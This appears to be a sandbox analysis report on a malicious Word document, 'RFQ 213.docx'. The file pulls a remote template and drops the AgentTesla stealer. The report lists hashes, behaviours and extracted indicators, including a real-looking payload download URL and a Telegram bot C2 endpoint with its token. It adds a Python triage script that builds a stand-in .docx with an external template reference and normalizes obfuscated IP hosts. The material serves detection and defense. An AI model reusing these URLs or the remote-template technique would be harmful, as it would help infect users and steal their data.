General
- Target: RFQ 213.docx
- Size: 10KB
- Sample: 230209-k9hqtaea29
- MD5: d857a5a515e5221f28ff63a350a56358
- SHA1: 138129e241cd6d40386a5e31ab156e21c16ae5e4
- SHA256: 6ac8d00d9effe1d0d2959a343a1a2216c467c24011f56d6a438983efe5e3432c
- SHA512: b0f1ba7666b0b27e9f96edd53e0b2173e4bf46e4ad353dcdf3af0e63ef8d9aac6c04760ee604bdb5975c3b2711ca51d2b878a28433532f0e8565ad23196fd966
- SSDEEP: 192:ScIMmtP5hG/b7XN+eOihO+5+5F7Jar/YEChI3ON:SPXRE7XtOih7wtar/YECOe
Static task: static1
Behavioral task: behavioral1 (Sample: RFQ 213.docx; Resource: win7-20220812-en)
Behavioral task: behavioral2 (Sample: RFQ 213.docx; Resource: win10v2004-20220812-en)
Malware Config
- Extracted (external download location referenced by the document): http://00o0o0o0sdf000000ooOOOO0000000ooooooooOOOOOsdoo000oo@647601465/13.doc
  The long string before the @ is URL userinfo, not the host. The host is a dotless-decimal IPv4 address: 647601465 decodes to 38.153.157.57. Block or hunt on the decoded address, since the decimal form will not match a dotted-quad indicator.
- Extracted (agenttesla): https://api.telegram.org/bot6010275350:AAH4W3CDRhQk0wgfyhQ_jITTy3QYmrxdDbw/
  Telegram Bot API endpoint used by the AgentTesla payload for exfiltration; the bot token is embedded in the URL path, so the full URL is the C2 indicator.
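As an added worked example (not part of the sandbox report and not code from the sample), the following Python shows how to triage the "Abuses OpenXML format to download file from external location" finding yourself: it builds a constructed minimal .docx whose word/_rels/settings.xml.rels carries an external relationship pointing at the URL extracted above, enumerates every TargetMode="External" relationship in the package, and normalizes the dotless-decimal host. The package layout and the attachedTemplate relationship type are assumptions; the report shows only the URL, not which part of the real document referenced it.

```python
import io
import ipaddress
import re
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"

# URL as extracted by the sandbox from RFQ 213.docx (the one value taken from the report).
REMOTE_TEMPLATE_URL = (
    "http://00o0o0o0sdf000000ooOOOO0000000ooooooooOOOOOsdoo000oo@647601465/13.doc"
)


def build_docx_with_remote_template(url: str) -> bytes:
    """Constructed stand-in package: a minimal OpenXML zip whose settings.xml.rels
    points at an external template. This is NOT the real sample, only its shape."""
    settings_rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        f'<Relationships xmlns="{RELS_NS}">'
        '<Relationship Id="rId1" '
        'Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" '
        f'Target="{url}" TargetMode="External"/>'
        "</Relationships>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml",
                   '<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        z.writestr("word/document.xml", "<document/>")
        z.writestr("word/settings.xml", '<settings><attachedTemplate id="rId1"/></settings>')
        z.writestr("word/_rels/settings.xml.rels", settings_rels)
    return buf.getvalue()


def external_relationships(docx_bytes: bytes) -> list:
    """Return every TargetMode="External" relationship, whichever .rels part holds it.
    Word only needs one such relationship (attachedTemplate, oleObject, hyperlink...)
    to reach out to the network when the document is opened."""
    found = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
                if rel.get("TargetMode", "Internal").lower() == "external":
                    found.append({
                        "part": name,
                        "type": rel.get("Type", "").rsplit("/", 1)[-1],
                        "target": rel.get("Target", ""),
                    })
    return found


def normalize_host(host: str) -> str:
    """Turn hex / octal / dotless-decimal hostnames into dotted-quad form.
    Order matters: a leading-zero octal literal is also all digits."""
    if re.fullmatch(r"0x[0-9a-f]+", host):      # e.g. 0x26999d39
        n = int(host, 16)
    elif re.fullmatch(r"0[0-7]+", host):         # e.g. 04646316471
        n = int(host, 8)
    elif re.fullmatch(r"\d+", host):             # e.g. 647601465
        n = int(host)
    else:
        return host                              # a normal DNS name
    return str(ipaddress.IPv4Address(n))


def analyse_url(url: str) -> dict:
    """Split the URL so the decoy userinfo is separated from the real host."""
    parts = urlsplit(url)
    raw_host = parts.hostname or ""
    return {
        "userinfo": parts.username or "",
        "raw_host": raw_host,
        "host": normalize_host(raw_host),
        "path": parts.path,
    }


if __name__ == "__main__":
    for rel in external_relationships(build_docx_with_remote_template(REMOTE_TEMPLATE_URL)):
        info = analyse_url(rel["target"])
        print(f'{rel["part"]}: {rel["type"]} -> {info["host"]}{info["path"]} '
              f'(raw host {info["raw_host"]}, userinfo length {len(info["userinfo"])})')
```

Run it against a real .docx by passing the file's bytes to external_relationships; any hit whose target is not an intranet resource you recognise is worth the same treatment the sandbox gave this one. The normalize_host step is what lets the decoded address (38.153.157.57) be matched against dotted-quad blocklists that the raw 647601465 form would slip past.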
Targets
- Target: RFQ 213.docx
- Size: 10KB
- MD5, SHA1, SHA256, SHA512, SSDEEP: identical to the values in the General section above (the same file is the only target).
- AgentTesla: Agent Tesla is a .NET-based remote access tool (RAT) and information stealer.
- Blocklisted process makes network request
- Downloads MZ/PE file
- Abuses OpenXML format to download file from external location
- Executes dropped EXE
- Loads dropped DLL
- Uses the VBS compiler for execution (the .NET Visual Basic compiler is a signed Microsoft binary commonly chosen as the host process for injected payload code; read together with the SetThreadContext signature below)
- Accesses Microsoft Outlook profiles
- Looks up external IP address via web service: uses a legitimate IP lookup service to find the infected system's external IP.
- Drops file in System32 directory
- Suspicious use of SetThreadContext (a process-injection indicator: rewriting another process's thread context redirects its execution to injected code)